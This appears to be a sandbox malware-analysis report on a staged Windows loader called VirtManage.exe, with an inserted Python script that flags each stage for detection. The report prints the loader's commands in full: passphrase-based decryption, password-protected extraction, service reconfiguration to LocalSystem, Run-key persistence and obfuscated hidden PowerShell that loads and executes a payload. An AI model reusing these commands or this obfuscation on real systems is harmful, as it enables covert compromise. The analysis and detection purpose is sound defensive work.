Windows Analysis Report
VirtManage.exe

Overview

General Information

Sample name: VirtManage.exe
Analysis ID: 1632485
MD5: 582b28a61d76e50d86c4b17dee4a9f42
SHA1: 762195d453f50d58f882e0d19ce6ae4b50f414bf
SHA256: 5f79572d35507c591a773925b8786c6caea69b19ef164b305d71070caf976707
Tags: exe, FORTUNEPRINTCENTRELIMITED, user-SquiblydooBlog

Detection

Score: 46
Range: 0 - 100
Confidence: 100%

Compliance

Score: 34
Range: 0 - 100

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains a domain name check
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • VirtManage.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\VirtManage.exe" MD5: 582B28A61D76E50D86C4B17DEE4A9F42)
    • gpg.exe (PID: 6968 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 7084 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 1988 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 2688 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2568 cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • gpg.exe (PID: 5860 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 6456 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1988 cmdline: sc config msdtc start= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 1192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3148 cmdline: sc config msdtc obj= "LocalSystem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winapi.exe (PID: 348 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe MD5: ADB9B72679B88DDE1749E0A438222156)
      • powershell.exe (PID: 1000 cmdline: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7460 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • whoami.exe (PID: 7556 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • msiexec.exe (PID: 5696 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6820 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6DE2D63DBA183F9FE048D9EF7023AC72 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • 7za.exe (PID: 7052 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7052 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • winapi.exe (PID: 4564 cmdline: "C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe" MD5: ADB9B72679B88DDE1749E0A438222156)
    • powershell.exe (PID: 6080 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7792 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • whoami.exe (PID: 7856 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
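The tree above is a staged loader: gpg.exe decrypts the dropped blobs with an inline passphrase, 7za.exe unpacks a password-protected archive, msiexec.exe installs RVTools.msi, sc.exe reconfigures the MSDTC service, and winapi.exe launches a hidden PowerShell that compiles C# through csc.exe and runs whoami.exe. The script below is an added example by the editor, not Joe Sandbox or Sigma code: it parses lines in this report's bullet format, derives parent/child links from indentation (PIDs are reused inside the trace, e.g. 1988 and 7052), and flags each step of the chain. The rule names are the editor's labels, and the sample input is a constructed, abbreviated copy of the tree with the PowerShell command line shortened to its first and last statements.

```python
"""Triage a Joe Sandbox-style process tree for the staged-loader chain shown above.
Editor's own example, not Joe Sandbox or Sigma code; rule names are the editor's labels."""
import re
from dataclasses import dataclass
from typing import Optional

# One node per bullet line.  PIDs are reused within a trace (1988 and 7052 above),
# so parent links are derived from indentation, never from the PID.
NODE_RE = re.compile(
    r"^(?P<indent>\s*)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) "
    r"MD5: [0-9A-Fa-f]{32}\)\s*$"
)


@dataclass
class Proc:
    image: str
    pid: int
    cmd: str
    depth: int
    parent: Optional["Proc"] = None


def parse_tree(text: str) -> list:
    """Turn the bulleted tree into Proc objects linked to their parents."""
    procs, stack = [], []
    for line in text.splitlines():
        m = NODE_RE.match(line)
        if not m:                      # "System is w10x64", "cleanup", blank lines
            continue
        depth = len(m["indent"]) // 2  # the report indents two spaces per level
        while stack and stack[-1].depth >= depth:
            stack.pop()
        p = Proc(m["image"].lower(), int(m["pid"]), m["cmd"], depth,
                 stack[-1] if stack else None)
        procs.append(p)
        stack.append(p)
    return procs


def _parent(p: Proc) -> str:
    return p.parent.image if p.parent else ""


RULES = [  # (label, predicate over a Proc)
    ("gpg-inline-passphrase-decrypt",
     lambda p: p.image == "gpg.exe" and "--passphrase" in p.cmd and "--batch" in p.cmd),
    ("7zip-password-extract",
     lambda p: p.image.startswith("7za") and " x " in p.cmd and re.search(r"\s-p\S+", p.cmd)),
    ("msi-install-from-programdata",
     lambda p: p.image == "msiexec.exe" and "/i" in p.cmd and "programdata" in p.cmd.lower()),
    ("msdtc-service-reconfig",
     lambda p: p.image == "sc.exe" and "config msdtc" in p.cmd.lower()),
    ("powershell-dynamic-csc",
     lambda p: p.image == "csc.exe" and _parent(p) == "powershell.exe"),
    ("powershell-whoami-recon",
     lambda p: p.image == "whoami.exe" and _parent(p) == "powershell.exe"),
    ("powershell-wildcard-obfuscation",  # wildcard command/variable lookup in a hidden window
     lambda p: p.image == "powershell.exe" and "hidden" in p.cmd.lower()
     and re.search(r"get-command \*|variable:[\\/]\*", p.cmd.lower())),
    ("tool-run-from-programdata",
     lambda p: re.match(r'^"?c:\\programdata\\', p.cmd.lower()) is not None),
]


def triage(text: str) -> list:
    """Return (image, pid, rule) for every rule that fires on every node."""
    return [(p.image, p.pid, name)
            for p in parse_tree(text) for name, hit in RULES if hit(p)]


# Constructed input: an abbreviated copy of the tree above (the PowerShell
# command line is shortened to its first and last statements).
SAMPLE_TREE = r"""
  • VirtManage.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\VirtManage.exe" MD5: 582B28A61D76E50D86C4B17DEE4A9F42)
    • gpg.exe (PID: 6968 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 2688 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
    • msiexec.exe (PID: 2568 cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • sc.exe (PID: 1988 cmdline: sc config msdtc start= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • sc.exe (PID: 3148 cmdline: sc config msdtc obj= "LocalSystem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • winapi.exe (PID: 348 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe MD5: ADB9B72679B88DDE1749E0A438222156)
      • powershell.exe (PID: 1000 cmdline: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • whoami.exe (PID: 7556 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • cleanup
"""

if __name__ == "__main__":
    for image, pid, rule in triage(SAMPLE_TREE):
        print(f"{pid:>5} {image:<16} {rule}")
```

Each rule is one observable from the tree rather than a signature on the binary, so the same script can be pointed at a Sysmon or EDR process export once the parser is swapped for that format; the parent-image rules (csc.exe and whoami.exe under powershell.exe) are the ones that survive renaming of the dropped tools.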
No configs have been found
No yara matches
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VirtManage.exe, ProcessId: 6732, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateOleview
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1000, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", ProcessId: 7428, ProcessName: csc.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentImage: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentProcessId: 348, ParentProcessName: winapi.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -Va
Source: Process started; Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7428, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP", ProcessId: 7460, ProcessName: cvtres.exe
Source: File created; Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1000, TargetFilename: C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\whoami.exe", CommandLine: "C:\Windows\system32\whoami.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1000, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\whoami.exe", ProcessId: 7556, ProcessName: whoami.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, 